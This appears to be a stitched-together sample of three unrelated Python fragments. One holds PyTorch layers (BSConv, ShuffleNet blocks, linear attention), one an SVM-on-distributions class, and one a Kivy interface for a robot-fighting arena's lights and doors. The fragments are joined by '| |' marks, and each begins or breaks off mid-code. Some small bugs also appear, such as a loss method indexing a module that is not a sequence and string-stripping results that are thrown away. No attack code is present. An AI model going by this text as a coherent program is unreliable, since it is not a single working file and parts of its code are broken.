bn_kwargs = {}
# pointwise
self.pw = nn.Linear(in_channels, out_channels)
# self.pw=torch.nn.Conv2d(
# in_channels=in_channels,
# out_channels=out_channels,
# kernel_size=(1, 1),
# stride=1,
# padding=0,
# dilation=1,
# groups=1,
# bias=False,
# )
# batchnorm
if with_ln:
self.ln = torch.nn.LayerNorm(out_channels, **bn_kwargs)
# depthwise
self.dw = torch.nn.Conv2d(
in_channels=out_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=out_channels,
bias=bias,
padding_mode=padding_mode,
)
def forward(self, fea):
fea = fea.permute(0, 2, 3, 1)
fea = self.pw(fea)
if self.with_ln:
fea = self.ln(fea)
fea = self.dw(fea.permute(0, 3, 1, 2))
return fea
class BSConvS(torch.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, dilation=1, bias=True,
padding_mode="zeros", p=0.25, min_mid_channels=4, with_ln=True, bn_kwargs=None):
super().__init__()
self.with_ln = with_ln
# check arguments
assert 0.0 <= p <= 1.0
mid_channels = min(in_channels, max(min_mid_channels, math.ceil(p * in_channels)))
if bn_kwargs is None:
bn_kwargs = {}
# pointwise 1
self.pw1 = nn.Linear(in_channels, mid_channels)
# self.pw1 = torch.nn.Conv2d(
# in_channels=in_channels,
# out_channels=mid_channels,
# kernel_size=(1, 1),
# stride=1,
# padding=0,
# dilation=1,
# groups=1,
# bias=False,
# )
# batchnorm
if with_ln:
self.ln1 = torch.nn.LayerNorm(mid_channels, **bn_kwargs)
# pointwise 2
self.pw2 = nn.Linear(mid_channels, out_channels)
# self.add_module("pw2", torch.nn.Conv2d(
# in_channels=mid_channels,
# out_channels=out_channels,
# kernel_size=(1, 1),
# stride=1,
# padding=0,
# dilation=1,
# groups=1,
# bias=False,
# ))
# batchnorm
if with_ln:
self.ln2 = torch.nn.LayerNorm(out_channels, **bn_kwargs)
# depthwise
self.dw = torch.nn.Conv2d(
in_channels=out_channels,
out_channels=out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=out_channels,
bias=bias,
padding_mode=padding_mode,
)
def forward(self, x):
fea = x.permute(0, 2, 3, 1)
fea = self.pw1(fea)
if self.with_ln:
fea = self.ln1(fea)
fea = self.pw2(fea)
if self.with_ln:
fea = self.ln2(fea)
fea = self.dw(fea.permute(0, 3, 1, 2))
return fea
def _reg_loss(self):
W = self[0].weight[:, :, 0, 0]
WWt = torch.mm(W, torch.transpose(W, 0, 1))
I = torch.eye(WWt.shape[0], device=WWt.device)
return torch.norm(WWt - I, p="fro")
# replicate the input RGB channels at the head of the net
class ChannelReplicate(nn.Module):
def __init__(self, factor=3):
super(ChannelReplicate, self).__init__()
self.factor = factor
def forward(self, input):
template = input
for i in range(0, self.factor-1):
input = torch.cat((template, input), 1)
return input
# shuffleNetv1
# shufflblock combine group_conv with channle shuffle
class ShuffleV1Block(nn.Module):
def __init__(self, inp, oup, *, group, first_group, mid_channels, ksize, stride):
super(ShuffleV1Block, self).__init__()
self.stride = stride
assert stride in [1, 2]
self.mid_channels = mid_channels
self.ksize = ksize
pad = ksize // 2
self.pad = pad
self.inp = inp
self.group = group
if stride == 2:
outputs = oup - inp
else:
outputs = oup
branch_main_1 = [
# pw
nn.Conv2d(inp, mid_channels, 1, 1, 0, groups=1 if first_group else group, bias=False),
nn.BatchNorm2d(mid_channels),
nn.ReLU(inplace=True),
# dw
nn.Conv2d(mid_channels, mid_channels, ksize, stride, pad, groups=mid_channels, bias=False),
nn.BatchNorm2d(mid_channels),
]
branch_main_2 = [
# pw-linear
nn.Conv2d(mid_channels, outputs, 1, 1, 0, groups=group, bias=False),
nn.BatchNorm2d(outputs),
]
self.branch_main_1 = nn.Sequential(*branch_main_1)
self.branch_main_2 = nn.Sequential(*branch_main_2)
if stride == 2:
self.branch_proj = nn.AvgPool2d(kernel_size=3, stride=2, padding=1)
def forward(self, old_x):
x = old_x
x_proj = old_x
x = self.branch_main_1(x)
if self.group > 1:
x = self.channel_shuffle_v1(x)
# 此处我觉得代码有问题,channle shuffle应该在branch_main_1中的pw之后
x = self.branch_main_2(x)
if self.stride == 1:
return F.relu(x + x_proj)
elif self.stride == 2:
return torch.cat((self.branch_proj(x_proj), F.relu(x)), 1)
def channel_shuffle_v1(self, x):
batchsize, num_channels, height, width = x.data.size()
assert num_channels % self.group == 0
group_channels = num_channels // self.group
x = x.reshape(batchsize, group_channels, self.group, height, width)
x = x.permute(0, 2, 1, 3, 4)
#将x换位,相当于x = (batchsize, self.group, group_channles, height, width)
x = x.reshape(batchsize, num_channels, height, width)
return x
# shufflev2block
# Gconv-->conv , remove channle shuffle in the branch
class ShuffleV2Block(nn.Module):
def __init__(self, inp, oup, mid_channels, *, ksize, stride):
super(ShuffleV2Block, self).__init__()
self.stride = stride
assert stride in [1, 2]
self.mid_channels = mid_channels
self.ksize = ksize
pad = ksize // 2
self.pad = pad
self.inp = inp
outputs = oup - inp
branch_main = [
# pw
nn.Conv2d(inp, mid_channels, 1, 1, 0, bias=False),
nn.BatchNorm2d(mid_channels),
nn.ReLU(inplace=True),
# dw
nn.Conv2d(mid_channels, mid_channels, ksize, stride, pad, groups=mid_channels, bias=False),
nn.BatchNorm2d(mid_channels),
# pw-linear
nn.Conv2d(mid_channels, outputs, 1, 1, 0, bias=False),
nn.BatchNorm2d(outputs),
nn.ReLU(inplace=True),
]
self.branch_main = nn.Sequential(*branch_main)
if stride == 2:
branch_proj = [
# dw
nn.Conv2d(inp, inp, ksize, stride, pad, groups=inp, bias=False),
nn.BatchNorm2d(inp),
# pw-linear
nn.Conv2d(inp, inp, 1, 1, 0, bias=False),
nn.BatchNorm2d(inp),
nn.ReLU(inplace=True),
]
self.branch_proj = nn.Sequential(*branch_proj)
else:
self.branch_proj = None
def forward(self, old_x):
if self.stride==1:
x_proj, x = self.channel_shuffle_v2(old_x)
return torch.cat((x_proj, self.branch_main(x)), 1)
# 将上一个block得到的old_x经过两个不同分支,注意这里的恒等体现了channle spilt. 然后横着concat
elif self.stride==2:
x_proj = old_x
x = old_x
return torch.cat((self.branch_proj(x_proj), self.branch_main(x)), 1)
# 对应paper中第二幅图
def channel_shuffle_v2(self, x):
batchsize, num_channels, height, width = x.data.size()
assert (num_channels % 4 == 0)
x = x.reshape(batchsize * num_channels // 2, 2, height * width)
x = x.permute(1, 0, 2)
x = x.reshape(2, -1, num_channels // 2, height, width)
return x[0], x[1]
# Performer
# for simpler you can just import and use like below
# from performer_pytorch import FastAttention
# https://github.com/lucidrains/performer-pytorch for more details
# Linear Transformer
# https://github.com/idiap/fast-transformers
# Linear Transformer
class FeatureMap(nn.Module):
"""Define the FeatureMap interface."""
def __init__(self, query_dims):
super().__init__()
self.query_dims = query_dims
def new_feature_map(self, device):
"""Create a new instance of this feature map. In particular, if it is a
random feature map sample new parameters."""
raise NotImplementedError()
def forward_queries(self, x):
"""Encode the queries `x` using this feature map."""
return self(x)
def forward_keys(self, x):
"""Encode the keys `x` using this feature map."""
return self(x)
def forward(self, x):
"""Encode x using this feature map. For symmetric feature maps it
suffices to define this function, but for asymmetric feature maps one
needs to define the `forward_queries` and `forward_keys` functions."""
raise NotImplementedError()
@classmethod
def factory(cls, *args, **kwargs):
"""Return a function that when called with the query dimensions returns
an instance of this feature map.
It is inherited by the subclasses so it is available in all feature
maps.
"""
def inner(query_dims):
return cls(query_dims, *args, **kwargs)
return inner
class ActivationFunctionFeatureMap(FeatureMap):
"""Define a feature map that is simply an element-wise activation
function."""
def __init__(self, query_dims, activation_function):
super().__init__(query_dims)
self.activation_function = activation_function
def new_feature_map(self, device):
return
def forward(self, x):
return self.activation_function(x)
class LinearAttention(nn.Module):
"""Implement unmasked attention using dot product of feature maps in
O(N D^2) complexity.
Given the queries, keys and values as Q, K, V instead of computing
V' = softmax(Q.mm(K.t()), dim=-1).mm(V),
we make use of a feature map function Φ(.) and perform the following
computation
V' = normalize(Φ(Q).mm(Φ(K).t())).mm(V).
The above can be computed in O(N D^2) complexity where D is the
dimensionality of Q, K and V and N is the sequence length. Depending on the
feature map, however, the complexity of the attention might be limited.
Arguments
---------
feature_map: callable, a callable that applies the feature map to the
last dimension of a tensor (default: elu(x)+1)
eps: float, a small number to ensure the numerical stability of the
denominator (default: 1e-6)
event_dispatcher: str or EventDispatcher instance to be used by this
module for dispatching events (default: the default
global dispatcher)
"""
def __init__(self, query_dimensions, feature_map=None, eps=1e-6,
event_dispatcher=""):
super(LinearAttention, self).__init__()
elu_feature_map = ActivationFunctionFeatureMap.factory(
lambda x: torch.nn.functional.elu(x) + 1
)
self.feature_map = (
feature_map(query_dimensions) if feature_map else
elu_feature_map(query_dimensions)
)
self.eps = eps
# self.event_dispatcher = EventDispatcher.get(event_dispatcher)
def forward(self, queries, keys, values, attn_mask, query_lengths,
key_lengths):
# Apply the feature map to the queries and keys
self.feature_map.new_feature_map(queries.device)
Q = self.feature_map.forward_queries(queries)
K = self.feature_map.forward_keys(keys)
# Apply the key padding mask and make sure that the attn_mask is
# all_ones
if not attn_mask.all_ones:
raise RuntimeError(("LinearAttention does not support arbitrary "
"attention masks"))
K = K * key_lengths.float_matrix[:, :, None, None]
# Compute the KV matrix, namely the dot product of keys and values so
# that | |
save_bags=True):
self.div_func = div_func
self.K = K
self.tuning_folds = tuning_folds
self.n_proc = n_proc
self.sigma_vals = sigma_vals
self.scale_sigma = scale_sigma
self.weight_classes = weight_classes
self.cache_size = cache_size
self.tuning_cache_size = tuning_cache_size
self.svm_tol = svm_tol
self.tuning_svm_tol = tuning_svm_tol
self.svm_max_iter = svm_max_iter
self.tuning_svm_max_iter = tuning_svm_max_iter
self.svm_shrinking = svm_shrinking
self.status_fn = status_fn
self.progressbar = progressbar
self.min_dist = min_dist
self.symmetrize_divs = symmetrize_divs
self.km_method = km_method
self.transform_test = transform_test
self.save_bags = save_bags
classifier = False
regressor = False
oneclass = False
svm_class = property(_not_implemented)
tuning_loss = staticmethod(_not_implemented)
eval_score = staticmethod(_not_implemented)
score_name = property(_not_implemented)
score_fmt = property(_not_implemented)
@property
def status_fn(self):
return get_status_fn(self._status_fn)
@status_fn.setter
def status_fn(self, value):
self._status_fn = value
@property
def progressbar(self):
if self._progressbar is None:
return self._status_fn is True
else:
return self._progressbar
@progressbar.setter
def progressbar(self, value):
self._progressbar = value
def _div_args(self, for_cache=True):
d = {
'min_dist': self.min_dist,
'status_fn': self._status_fn,
'progressbar': self.progressbar,
}
if for_cache:
d.update({
'div_func': self.div_func,
'K': self.K,
'n_proc': self.n_proc,
})
else:
d.update({
'specs': [self.div_func],
'Ks': [self.K],
'cores': self.n_proc,
})
return d
def clear_fit(self):
for attr_name in dir(self):
if attr_name.endswith('_') and not attr_name.startswith('_'):
delattr(self, attr_name)
_fit_docstr = '''
Tunes parameters and then fits an SVM using the final parameters
on training data.
X should be one of:
- an sdm.Features instance (preferred)
- a list of row-instance data matrices each (num_pts x dim),
where num_pts can vary but dim needs to be constant
- None, if save_bags is False and you're passing divs. In this case,
you need to compute divergences for any test points yourself.
{y_doc}
sample_weight (optional): a vector of weights applied to each sample,
where 1 means unweighted.
divs (optional): precomputed divergences among the passed points
(an array of shape num_bags x num_bags)
divs_cache (optional): a filename for a cache file. Note that this
needs to be on the TRAINING data only, in the same order. Any names
or categories in X are used to verify the cache file is for the
right data.
ret_km (optional, boolean): if True, returns the final training kernel
matrix.
'''
def fit(self, X, y, sample_weight=None, divs=None, divs_cache=None,
ret_km=False):
if X is None:
if divs is None:
raise ValueError("need to pass either X or divs to fit()")
if self.save_bags:
msg = "Need to pass data to fit() if save_bags is true."
raise ValueError(msg)
n_bags = None
else:
n_bags = len(X)
if divs is not None:
divs = np.asarray(divs)
if divs.ndim != 2:
raise ValueError("divs should be n_bags x n_bags")
a, b = divs.shape
if a != b:
raise ValueError("divs should be n_bags x n_bags")
if n_bags is None:
n_bags = a
elif a != n_bags:
raise ValueError("divs should be n_bags x n_bags")
y = np.squeeze(y)
if y.shape != (n_bags,):
raise ValueError("y should be 1d of length n_bags")
if self.classifier:
if not is_categorical_type(y) or np.any(y < -1):
raise ValueError("y for classification should be ints >= -1")
train_idx = y != -1
else:
train_idx = ~np.isnan(y)
if sample_weight is None:
train_sample_weight = None
else:
sample_weight = np.asarray(sample_weight)
train_sample_weight = sample_weight[train_idx]
train_y = y[train_idx]
if train_y.size < 2:
raise ValueError("must train with at least 2 points")
if not self.oneclass and np.all(train_y == train_y[0]):
raise ValueError("can't train with only one class")
if (self.save_bags or divs is None) and not isinstance(X, Features):
X = Features(X)
if self.save_bags:
self.train_bags_ = X[train_idx]
# get divergences
if divs is None:
self.status_fn('Getting divergences...')
div_args = self._div_args(for_cache=True)
divs = get_divs_cache(X, cache_filename=divs_cache, **div_args)
if self.symmetrize_divs:
divs = symmetrize(divs)
# tune params
self.status_fn('Tuning SVM parameters...')
self._tune_params(
divs=np.ascontiguousarray(divs[np.ix_(train_idx, train_idx)]),
labels=train_y, sample_weight=train_sample_weight)
# project the final Gram matrix
self.status_fn('Doing final projection')
fn = partial(make_km, divs, self.sigma_, method=self.km_method)
if self.transform_test:
full_km, self.test_transformer_ = fn(ret_test_transformer=True)
else:
full_km = fn()
train_km = np.ascontiguousarray(full_km[np.ix_(train_idx, train_idx)])
# train the selected SVM
self.status_fn('Training final SVM')
params = self._svm_params(tuning=False)
clf = self.svm_class(**params)
if self.oneclass:
clf.fit(train_km, sample_weight=train_sample_weight)
else:
clf.fit(train_km, train_y, sample_weight=train_sample_weight)
self.svm_ = clf
if ret_km:
return full_km
fit.__doc__ = _fit_docstr.format(y_doc="""
y: a vector of class labels (depending on the subclass)
""")
def _prediction_km(self, data=None, divs=None, km=None):
# TODO: smarter projection options for inductive use
if getattr(self, 'svm_', None) is None:
raise ValueError("SDM: need to fit before you can predict!")
if km is not None:
return km
if divs is not None:
destroy_divs = False
else:
if not self.save_bags:
raise ValueError("SDM that doesn't save_bags can't predict "
"without explicit divs")
n_train = len(self.train_bags_)
n_test = len(data)
self.status_fn('Getting test bag divergences...')
mask = np.zeros((n_train + n_test, n_train + n_test), dtype=bool)
mask[:n_train, -n_test:] = True
mask[-n_test:, :n_train] = True
divs = np.squeeze(estimate_divs(
self.train_bags_ + data, mask=mask,
**self._div_args(for_cache=False)))
divs = (divs[-n_test:, :n_train] + divs[:n_train, -n_test].T) / 2
destroy_divs = True
km = rbf_kernelize(divs, self.sigma_, destroy=destroy_divs)
if self.transform_test:
km = self.test_transformer_(km)
return km
def predict(self, data, divs=None, km=None):
km = self._prediction_km(data, divs=divs, km=km)
preds = self.svm_.predict(km)
if self.classifier:
assert np.all(preds == np.round(preds))
return preds.astype(int)
else:
return preds
def decision_function(self, data, divs=None, km=None):
km = self._prediction_km(data, divs=divs, km=km)
return self.svm_.decision_function(km)
def score(self, data, labels, divs=None, km=None):
preds = self.predict(data, divs=divs, km=km)
return self.eval_score(labels, preds)
def transduct(self, train_bags, train_labels, test_bags, divs=None,
train_weight=None, mode='predict', save_fit=False):
'''
Trains an SDM transductively, where the kernel matrix is constructed on
the training + test points, the SVM is trained on training points, and
predictions are done on the test points.
The SVM itself is inductive (given the kernel).
Arguments
---------
train_bags: a Features instance, list of row-instance data matrices,
or None. (If None, divs is required.)
train_labels: a label vector, like y for fit() except that the
"semi-supervised" label is not supported.
test_bags: a Features instance, list of row-instance data matrices,
or None. (If None, divs is required.)
divs (optional): a matrix of divergences of shape
(num_train + num_test, num_train + num_test), ordered with the
training bags first and then the test bags following.
Transparent caching is not yet supported here.
train_weight (optional): a vector of weights applied to each training
sample, where 1 means unweighted.
mode (default 'predict'): one of 'predict', 'dec', 'proba', 'log_proba'.
Returns the results of predict(), decision_function(),
predict_proba(), or predict_log_proba(), depending on this argument.
The latter two only work for classifiers.
save_fit (boolean, default false): By default, the SDM object does not
save its fit and is reset to an un-fit state as if it had just been
constructed. Passing save_fit=True makes the fit persistent.
'''
# TODO: support transparent divs caching by passing in indices
# TODO: support passing in pre-stacked train/test features,
# for minimal stacking purposes
train_labels = np.squeeze(train_labels)
if train_labels.ndim != 1:
raise TypeError("train_labels should be 1d")
n_train = train_labels.shape[0]
pred_fns = {'predict': self.predict, 'dec': self.decision_function}
if self.classifier:
pred_fns['proba'] = self.predict_proba
pred_fns['log_proba'] = self.predict_log_proba
if mode not in pred_fns:
raise ValueError("unknown transduction mode '{}'".format(mode))
pred_fn = pred_fns[mode]
if self.classifier:
if not is_categorical_type(train_labels) or train_labels.min() < 0:
raise TypeError("train_labels should be nonnegative integers")
else:
if not np.all(np.isfinite(train_labels)):
raise TypeError("train_labels should be finite")
if divs is not None:
divs = np.asarray(divs)
if divs.ndim != 2:
raise TypeError("divs should be 2d")
n_both, b = divs.shape
if n_both != b:
raise TypeError("divs should be n_bags x n_bags")
n_test = n_both - n_train
if n_test < 1:
raise TypeError("divs should have length num_train + num_test")
combo_bags = None
else:
if train_bags is None or test_bags is None:
raise TypeError("must pass either divs or train_bags/test_bags")
if len(train_bags) != n_train:
raise TypeError("train_bags and train_labels should have "
"consistent lengths")
n_test = len(test_bags)
if divs is None or (save_fit and self.save_bags):
if train_bags is None or test_bags is None:
raise TypeError("must pass bags if save_fit and save_bags")
combo_bags = train_bags + test_bags
if not isinstance(combo_bags, Features):
combo_bags = Features(combo_bags)
if not save_fit:
old_save_bags = self.save_bags
self.save_bags = False # avoid keeping copies around
# make fake labels for test data, so fit() knows what they are
test_fake_labels = np.empty(n_test, dtype=train_labels.dtype)
test_fake_labels.fill(-1 if self.classifier else np.nan)
combo_labels = np.hstack((train_labels, test_fake_labels))
if train_weight is not None:
train_weight = np.r_[train_weight, np.zeros(n_test)]
full_km = BaseSDM.fit(self, X=combo_bags, y=combo_labels, divs=divs,
sample_weight=train_weight, ret_km=True)
preds = pred_fn(test_bags, km=full_km[-n_test:, :n_train])
| |
from kivy.config import Config
Config.read("BattleBox.ini")
from kivy.app import App
from kivy.animation import Animation
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.uix.widget import Widget
from kivy.uix.textinput import TextInput
from kivy.uix.dropdown import DropDown
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.gridlayout import GridLayout
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivy.properties import ListProperty, ObjectProperty, StringProperty, BoundedNumericProperty, NumericProperty, BooleanProperty
from BattleBox.data import BBViewModelProp, BBDeathMatchProp, BBSoccerMatchProp, BBRunDeathMatchProp
from BattleBox.arena import HardwareInterface
from kivy.core.window import Window
from kivy.logger import Logger
from math import floor
import platform, re, random
from datetime import datetime
import time
from functools import partial
import subprocess as subp
import asyncio
from ipc.communicator import InstructionServer
from ipc.message import *
import json
random.seed(datetime.now())
# Coloring = Red->Green->Blue
RED = (255, 0, 0)
MATCH_COUNT_DOWN_RED = RED
YELLOW = (255, 255, 0)
DD_YELLOW = (200, 255, 0)
GREEN = (0, 255, 0)
SOCCER_GREEN = (0, 255, 68)
ORANGE = (255, 68, 0)
PURPLE = (93, 0, 255)
WHITE = (255, 255, 255)
BLUE = (0, 0, 255)
PINK = (255, 0, 149)
DOOR_NOT_CLOSED_WARNING_COLOR = (255, 174, 0)
PLAYER_2_COLOR = (0, 110, 255)
PLAYER_1_COLOR = RED
STOP_LIGHT_RED = (184, 29, 19)
STOP_LIGHT_ORANGE = (218, 83, 10)
STOP_LIGHT_YELLOW = (239, 183, 0)
STOP_LIGHT_GREEN = (0, 255, 0)
BrightnessPerMillis = 1/30
class MainScreen(Screen):
lights_brightness = NumericProperty(0)
def __init__(self, **kwargs):
super(MainScreen, self).__init__(**kwargs)
self.Breath = None
def on_enter(self):
App.get_running_app().arena.led_brightness_and_fill(10, *WHITE)
self.lights_brightness = 10
self.breath_anim = (Animation(lights_brightness=255,
s=BrightnessPerMillis, duration=1.0, t="linear") +
Animation(lights_brightness=10, s=BrightnessPerMillis,
duration=1.0, t="linear"))
self.breath_anim.repeat = True
self.breath_anim.start(self)
def on_lights_brightness(self, instance, value):
App.get_running_app().arena.led_brightness(floor(value))
def on_pre_leave(self):
Animation.cancel_all(self)
App.get_running_app().arena.led_brightness(255)
class UIntInput(TextInput):
pat = re.compile('[^0-9]*')
def insert_text(self, substring, from_undo=False):
s = re.sub(self.pat, '', substring)
return super(UIntInput, self).insert_text(s, from_undo=from_undo)
def on_text(self, instance, value):
''' This makes sure the value is never empty and we always have something
even if it's a zero
'''
if value == "":
self.text = "0"
class DeathmatchScreen(Screen):
def reset_screen(self, app):
# app.data.death_match.reset()
app.data.death_match.player_one_name = ""
app.data.death_match.player_two_name = ""
self.ids.dm_door_drop.do_update_main_button(app.data.death_match.door_drop)
data = ObjectProperty(None)
lights_brightness = NumericProperty()
def __init__(self, **kwargs):
super(DeathmatchScreen, self).__init__(**kwargs)
def on_enter(self):
App.get_running_app().arena.led_brightness_and_fill(10, 255, 0, 0)
self.lights_brightness = 10
self.breath_anim = (Animation(lights_brightness=255,
s=BrightnessPerMillis, duration=1.0, t="linear") +
Animation(lights_brightness=10, s=BrightnessPerMillis,
duration=1.0, t="linear"))
self.breath_anim.repeat = True
self.breath_anim.start(self)
def on_lights_brightness(self, instance, value):
App.get_running_app().arena.led_brightness(floor(value))
def on_pre_leave(self):
Animation.cancel_all(self)
App.get_running_app().arena.led_brightness(255)
def drop_down_changed(self, instance, x):
if x == 'Drop Both':
self.ids.dm_door_drop_duration.disabled = False
elif x == 'Never drop doors':
self.ids.dm_door_drop_duration.disabled = True
elif x == 'Doors Always Open':
self.ids.dm_door_drop_duration.disabled = True
elif x == 'Drop Player 1 Door Only':
self.ids.dm_door_drop_duration.disabled = False
elif x == 'Drop Player 2 Door Only':
self.ids.dm_door_drop_duration.disabled = False
elif x == 'Drop Random Door':
self.ids.dm_door_drop_duration.disabled = False
def on_battle_validation(self, app, root):
if self.data.duration == 0:
create_popup("death match", "Match duration cannot be zero")
return
if not self.ids.dm_door_drop_duration.disabled:
if self.data.door_drop_duration == 0:
create_popup("death match", "Door drop duration cannot be zero.\n\nIf you want them open all of the time please select that option from the drop down.")
return
if self.data.door_drop_duration >= self.data.duration:
create_popup("death match", "Door drop duration must be less then the match duration.")
return
self.data.player_one_name.strip()
if self.data.player_one_name != "":
if len(self.data.player_one_name) >= 20:
create_popup("death match", "Player one's name must be less then 20 charactres")
return
self.data.player_two_name.strip()
if self.data.player_two_name != "":
if len(self.data.player_two_name) >= 20:
create_popup("death match", "Player two's name must be less then 20 charactres")
return
if self.data.player_one_name != "" and self.data.player_two_name != "":
if self.data.player_one_name == self.data.player_two_name:
create_popup("death match", "Players one and two cannot both have the same names")
return
# If this is disabled then we need to make sure the doors are closed before
# we begin.
if self.ids.dm_door_drop_duration.disabled:
temp = app.root.get_screen('WaitForPlayers')
temp.reset_screen("RunDeathmatch", "Player", self.name, "FIGHT!!!")
app.root.current = 'WaitForPlayers'
root.manager.transition.direction = 'left'
return
temp = app.root.get_screen('WaitForPlayersAndDoors')
temp.reset_screen("RunDeathmatch", "Player", self.name, "FIGHT!!!")
app.root.current = 'WaitForPlayersAndDoors'
root.manager.transition.direction = 'left'
class CountDownTrigger:
__doc__ = '''All runtimes given in seconds'''
def __init__(self):
self.stop_time = 0
self.start_time = 0
self.increment = 0
self.time_increment_elapsed = 0
self.is_active = False
self.did_complete = False
self.light_color = None
self.on_complete = None
self.number_of_lights_on = 0
def duration(self):
return self.start_time - self.stop_time
def reset(self, completionTime, runDuration, lightCount, matchDuration, color, on_complete):
self.is_active = False
self.did_complete = False
self.stop_time = completionTime
self.start_time = completionTime + runDuration
if self.start_time > matchDuration:
runDuration = self.start_time - matchDuration
self.start_time = matchDuration
self.number_of_lights_on = 0
self.time_increment_elapsed = 0
self.color = color
self.on_complete = on_complete
def dump(self, name):
print("Stats for", name)
print("self.stop_time", self.stop_time)
print("self.start_time", self.start_time)
print("self.increment", self.increment)
print("self.time_increment_elapsed", self.time_increment_elapsed)
print("self.is_active", self.is_active)
print("self.did_complete", self.did_complete)
print("self.light_color", self.light_color)
print("self.on_complete", self.on_complete)
print("self.number_of_lights_on", self.number_of_lights_on)
def does_overlap(self, other):
return self.stop_time > other.stop_time and other.stop_time < self.start_time
class SelectADeathMatchWinnerScreen(Screen):
pass
class RunDeathmatchScreen(Screen):
data = ObjectProperty(None)
dmData = ObjectProperty(None)
# cd = count down
cd_lights_on = NumericProperty(0)
match_over_lights = NumericProperty(0)
# Used to trigger the dropping of the doors
doors_closed = BooleanProperty(False)
def __init__(self, **kwargs):
self.register_event_type("on_drop_doors")
super(RunDeathmatchScreen, self).__init__(**kwargs)
self.match_over_trigger = CountDownTrigger()
self.door_drop_trigger = CountDownTrigger()
self.will_drop_doors = False
self.match_over_active = False
self.cd_animation = None
self.ddColor = DD_YELLOW
self.match_olver_color = MATCH_COUNT_DOWN_RED
def _do_reset(self, app, root, deltaTime):
self.ids.countDownClock.start(self.dmData.duration)
Logger.info("MainApp->RunDeathMatchScreen->_do_reset: Completed screen reset")
return False
def reset_screen(self, app, root):
# Sending command to start countdown
Logger.info("MainApp->RunDeathMatchScreen->reset_screen: Scheduling reset")
self.will_drop_doors = False
self.match_over_trigger.reset(0, 30,
App.get_running_app().get_led_count(),
self.dmData.duration,
self.match_olver_color,
self.on_complete_match_count_down)
if self.dmData.door_drop == 'Drop Both':
self.will_drop_doors = True
elif self.dmData.door_drop == 'Never drop doors':
self.will_drop_doors = False
elif self.dmData.door_drop == 'Doors Always Open':
self.will_drop_doors = False
App.get_running_app().open_player_1_door(3)
App.get_running_app().open_player_2_door(3)
elif self.dmData.door_drop == 'Drop Player 1 Door Only':
self.will_drop_doors = True
elif self.dmData.door_drop == 'Drop Player 2 Door Only':
self.will_drop_doors = True
elif self.dmData.door_drop == 'Drop Random Door':
self.will_drop_doors = True
else:
print("Value for door drop = ", self.dmData.door_drop)
if self.will_drop_doors:
self.door_drop_trigger.reset(self. dmData.door_drop_duration,
15, App.get_running_app().get_led_count(), self.dmData.duration,
DD_YELLOW, self.on_completed_door_drop_count_down)
self.match_start_time = round(time.time() * 1000) + 300
app.send_run_deathmatch_cmd(self.match_start_time, self.dmData.duration, self.will_drop_doors,
self.door_drop_trigger.start_time, self.door_drop_trigger.stop_time)
Clock.schedule_once(partial(self._do_reset, app, root), 0.3)
def on_completed_door_drop_count_down(self):
print("COmpleted door drop count down")
def on_complete_match_count_down(self):
print("Complete match count down")
def cancel_count_downs(self):
Animation.cancel_all(self)
def on_seconds(self, instance, value):
if self.will_drop_doors:
if not self.door_drop_trigger.is_active:
if value <= self.door_drop_trigger.start_time:
self.cd_lights_on = 0
self.prevTick = -1
self.cd_animation = Animation(cd_lights_on=int(App.get_running_app().get_led_count())-1,
duration=self.door_drop_trigger.duration(),
t="linear")
self.cd_animation.bind(on_complete=self.on_dd_complete)
self.door_drop_trigger.is_active = True
self.cd_animation.start(self)
self.ddColor = self.door_drop_trigger.color
if not self.match_over_trigger.is_active:
if value <= self.match_over_trigger.start_time:
self.match_over_trigger.is_active = True
self.match_over_prev_tick = -1
self.match_over_lights = 0
self.match_over_animation = Animation(match_over_lights=int(App.get_running_app().get_led_count())-1,
duration=self.match_over_trigger.duration(),
t="linear")
self.match_over_animation.bind(on_complete=self.on_match_complete)
self.match_over_animation.start(self)
def on_dd_complete(self, animation, value):
App.get_running_app().do_door_drop()
App.get_running_app().arena.led_brightness_and_fill(255, 255, 255, 255)
def on_cd_lights_on(self, instance, value):
if self.prevTick == -1:
self.prevTick = floor(value)
App.get_running_app().arena.set_led(self.prevTick, *self.ddColor)
elif self.prevTick != floor(value):
self.prevTick = int(floor(value))
App.get_running_app().arena.set_led(self.prevTick, *self.ddColor)
def on_match_complete(self, animation, value):
print("Match over!")
def on_match_over_lights(self, instance, value):
if self.match_over_prev_tick == -1:
self.match_over_prev_tick = floor(value)
App.get_running_app().arena.set_led(self.match_over_prev_tick,
*self.match_over_trigger.color)
elif self.match_over_prev_tick != floor(value):
self.match_over_prev_tick = int(floor(value))
App.get_running_app().arena.set_led(self.match_over_prev_tick,
*self.match_over_trigger.color)
def on_data(self, instance, value):
pass
def on_drop_doors(self):
pass
def on_pre_enter(self):
pass
def on_leave(self):
pass
class ErrorMessagePopUp(Popup):
message = StringProperty("")
def __init__(self, **kwargs):
super(ErrorMessagePopUp, self).__init__(**kwargs)
def create_popup(screenName, msg):
ErrorMessagePopUp(title='Invalid {0} configuration'.format(screenName),
message=msg,
size_hint=(None, None), size=(400, 400),
auto_dismiss=False).open()
class SoccerScreen(Screen):
data = ObjectProperty(None)
lights_brightness = NumericProperty()
def __init__(self, **kwargs):
super(SoccerScreen, self).__init__(**kwargs)
def on_enter(self):
App.get_running_app().arena.led_brightness_and_fill(10, *SOCCER_GREEN)
self.lights_brightness = 10
self.breath_anim = (Animation(lights_brightness=255,
s=BrightnessPerMillis, duration=1.0, t="linear") +
Animation(lights_brightness=10, s=BrightnessPerMillis,
duration=1.0, t="linear"))
self.breath_anim.repeat = True
self.breath_anim.start(self)
def on_lights_brightness(self, instance, value):
App.get_running_app().arena.led_brightness(floor(value))
def on_pre_leave(self):
Animation.cancel_all(self)
App.get_running_app().arena.led_brightness(255)
def reset_screen(self, app):
# app.data.soccer_match.reset()
app.data.soccer_match.team_one_name = ""
app.data.soccer_match.team_two_name = ""
pass
def on_match_validation(self, app, root):
if self.data.duration == 0:
create_popup("soccer match", "Match duration cannot be zero")
return
if self.data.points == 0:
create_popup("soccer match", "Number of match points cannot be zero.")
return
self.data.team_one_name.strip()
if self.data.team_one_name != "":
if len(self.data.team_one_name) >= 20:
create_popup("soccermatch", "Player one's name must be less then 20 charactres")
return
self.data.team_two_name.strip()
